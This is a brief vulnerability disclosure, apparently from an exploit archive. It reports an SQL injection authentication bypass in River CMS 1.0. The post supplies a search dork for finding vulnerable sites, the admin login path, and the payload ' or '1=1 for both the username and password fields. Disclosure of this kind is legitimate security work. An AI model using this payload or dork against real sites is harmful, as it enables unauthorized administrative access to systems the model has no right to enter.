River CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
eceaf0c5520ec0d47cf564935d3b7f14931412c77ad6575a55d21f8156f74d86
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: River CMS
# Version: 1.0
# Vendor: https://rivercms.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered By River CMS"
#################################################################
Vulnerability:
https://site.ir/admin/
Username: ' or '1=1
Password: ' or '1=1
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: https://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################